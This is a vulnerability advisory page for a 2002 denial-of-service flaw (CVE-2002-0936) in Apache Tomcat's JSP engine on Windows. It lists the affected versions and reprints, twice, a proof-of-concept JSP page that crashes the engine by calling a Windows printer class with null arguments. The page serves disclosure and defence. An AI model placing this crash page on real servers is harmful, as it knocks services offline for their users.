Apache Tomcat JSP Engine Denial of Service Vulnerability
BID:4995
Info
Apache Tomcat JSP Engine Denial of Service Vulnerability
| Bugtraq ID: | 4995 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2002-0936 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 12 2002 12:00AM |
| Updated: | Jul 11 2009 01:56PM |
| Credit: | Discovery credited to Marc Schoenefeld <[email protected]>. |
| Vulnerable: |
Apache Tomcat 4.1 Apache Tomcat 4.0.3 Apache Tomcat 4.0.2 Apache Tomcat 4.0.1 Apache Tomcat 4.0 Apache Tomcat 3.3.1 Apache Tomcat 3.3 Apache Tomcat 3.2.1 Apache Tomcat 3.2 |
| Not Vulnerable: | |
Discussion
Apache Tomcat JSP Engine Denial of Service Vulnerability
A vulnerability has been reported in Apache Tomcat for Windows that results in a denial of service condition. The vulnerability occurs when Tomcat encounters a malicious JSP page.
The following snippet of code is reported to crash the Tomcat JSP engine:
new WPrinterJob().pageSetup(null,null);
A vulnerability has been reported in Apache Tomcat for Windows that results in a denial of service condition. The vulnerability occurs when Tomcat encounters a malicious JSP page.
The following snippet of code is reported to crash the Tomcat JSP engine:
new WPrinterJob().pageSetup(null,null);
Exploit / POC
Apache Tomcat JSP Engine Denial of Service Vulnerability
The following proof of concept was provided by Marc Schoenefeld <[email protected]>:
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>
<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>
</body>
</html>
The following proof of concept was provided by Marc Schoenefeld <[email protected]>:
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>
<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>
</body>
</html>
References
Apache Tomcat JSP Engine Denial of Service Vulnerability
References:
References:
- [VulnWatch] Generic Crash-JSP (Rain Forest Puppy
) - Tomcat Homepage (Apache Software Foundation)